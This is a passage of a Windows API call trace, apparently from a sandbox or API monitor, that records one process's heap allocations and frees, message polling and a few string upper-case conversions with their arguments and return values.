0x2a71b78 [0208.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0208.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0208.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0208.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0208.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0208.576] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0208.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0208.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0208.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0208.576] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0208.576] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0208.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0208.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0208.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.577] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.578] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75380 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0208.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.578] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0208.579] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0208.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0208.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0208.579] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0208.579] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0208.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0208.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0208.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8a0 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0208.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0208.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9a8 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa20 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0208.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0208.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0208.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0208.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0208.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0208.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0208.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0208.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0208.581] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0208.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0208.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0208.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0208.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0208.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0208.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0208.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0208.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0208.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0208.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0208.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0208.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0208.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0208.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0208.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0208.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0208.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0208.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0208.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0208.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0208.584] 